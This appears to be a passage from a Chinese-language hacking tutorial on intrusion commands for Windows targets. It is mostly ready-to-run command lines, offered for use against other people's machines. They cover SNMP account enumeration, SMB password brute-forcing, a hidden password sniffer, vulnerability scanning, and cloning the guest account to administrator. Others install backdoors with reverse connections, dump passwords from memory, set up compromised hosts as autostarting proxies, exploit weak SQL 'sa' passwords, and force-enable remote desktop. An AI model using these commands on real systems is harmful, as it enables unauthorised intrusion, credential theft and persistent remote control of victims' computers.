

windows下dos攻击、入浸命令讲解
Snmputil walk 192.168.1.1 ylinuxs.1.3.6.1.4.1.77.1.2.25.1.5 \\查询帐户
Snmputil walk 对方ip public.1.3.6.1.2.1.25.4.2.1.2 \\查询系统进程
Snmputil walk 对方ip public.1.3.6.1.4.1.77.1.2.25.1.1 \\查询用户列表
Snmputil walk 对方ip public .1.3.6.1.2.1.1 \\列出对方系统信息
该工具的作用:查询一部分系统而已
我个人这个没有很大的作用,查看到了系统信息,要攻破还是需要运气
8、暴力破解系统密码
Smbcrack
Smbcrack ip username 字典路径 端口
说明:首先你需要用字典自己做一个字典,用户名建议是administrator 因为这个是系统默认的管理员估计大多数人的主机这个帐号还是存在的,端
口可以是139、137、445等系统开启的netBOIS协议端口就可以!
9、小巧的嗅叹器_xsniff(若有需要还可以用sniffer,对于sniffer全是英文的,没有一个月,一般人拿来用处不大,若你精通了,那可就厉害了,若想
下载或是想学习去http://hi.baidu.com/ylinuxs/blog/item/2202cb408ef79c1c9313c634.html,上面有说明文件.)
Xsniff是一个小巧的嗅叹器,可以嗅叹UDP/TCP协议的信息
使用语法:
Xsniff –pass –hide –log c:\pass.log –pass
c:\pass.log 是保存记录文件,建议选择一个深的目录,可以自定义
性能参数:
-hide 隐藏在后台运行 -log:生成嗅叹的日志文档
Pass.log:嗅叹的日志文档文档名,可以自定义
-TCP:捕获TCP数据包
-UDP:捕获UDP数据包
-ICMP:捕获ICMP数据包
-HOST:主机名或ip地址
-PORT:指定端口嗅叹
-ASC输出出时保存为ASCII格式
10、SFIND 命令行扫描器
例子:
Sfind –p 3389 192.168.1.1 192.168.1.255
扫描192.168.1.1段的1-255主机的3389端口
Sfind –cgi 192.168.1.1 //扫描192.168.1.1的cgi漏洞
Sfind –ftp 192.168.1.1 //扫描192.168.1.1的ftp漏洞
Sfind –idq 192.168.1.1 //扫描192.168.1.1的idg漏洞
11、克隆帐号CA:
CA.EXE \\ip administrator “” guest 123
将GUEST帐号克隆成管理员
Administrator 的密码为空用”” guest的密码是123
12、后门使用:
这里我介绍小榕的bits
说明:BITS必须放在system32目录下才可以安装
安装命令:rundll32.exe BITS.dll install rasato ylinuxs \\指定后门特征为ylinuxs
连接激活:
正向连接(用nc连接即可):ylinuxs:@ip[xell]:99
反向连接:ylinuxs:@ip[rxell]:yourip:port
卸载:rundll32.exe BITS.dll uninstall
同时也介绍T-CMD
安装命令:
t-cmd –install
然后:telnet ip 20540
就可以了,T-CMD是菜鸟的好选择
13、系统密码查看_showpass
直接进入showpass的目录直接运行showpass只要当前用户在线,那么showpass就可以把他的密码从内存里找出来。
14、代理肉鸡的制作_SK
安装命令:
sk.exe –install \\安装SK
sk.exe -config port 4999 \\设置端口为4999
sk.exe -config starttype 2 \\设置启动项为自启动
net start skserver \\启动SK代理服务
15、SQL弱口令利用
我本来在这里不想说这个,但是希望大家能够综合利用所以我就直接说了。(SQL的弱口令大家可以用WINDOWS 2000自动攻击探测器扫描.)
Sqlexeca.exe ip sa 123
因为是弱口令,所以用123表示,同时也告诉大家SQL服务器的最高权限帐户是SA,这个是不能更改的!
16、终端服务的开启与使用
这个恐怕就是菜鸟们最喜欢的话题了一个图形话的交互界面
工具:3389.exe 3389.vbe 3389.bat
方法一:3389.exe:只需要把此文件复制到你所要开启的服务器运行此程序就可以了。
方法二:3389.vbe:这个是一个脚本文件,使用方法如下:
Cscript 3389.vbe ip username pass port /r //密码必须是管理员密码 port是终端的端口,这个是可以自己定义的,参数.r是说
明开启成功自动重启动服务器!你也可以使用/fr,FR的意思就是强制重新启动服务器!
方法三:3389.bat:这个是一个BAT文件利用批处理来开3389网络上很多相关资料大家可以参考参考,3389.bat的内容如下:
echo [components] > d:\ylinuxs
echo tsenable=on >> d:\ylinuxs
sysocmgr /i:d:\winnt\inf\sysoc.inf /u:d:\ylinuxs /q
大家可以把上述代码保存一个bat然后放到要开3389的服务器上,在CMD下运行,服务器的3389就开启了。
终端的连接:
这里推荐使用2003或者XP的终端登陆器,然后系统会提示你输入帐号与密码,输入以后直接登陆就可以了!
关键词:windows下dos攻击、入浸命令讲解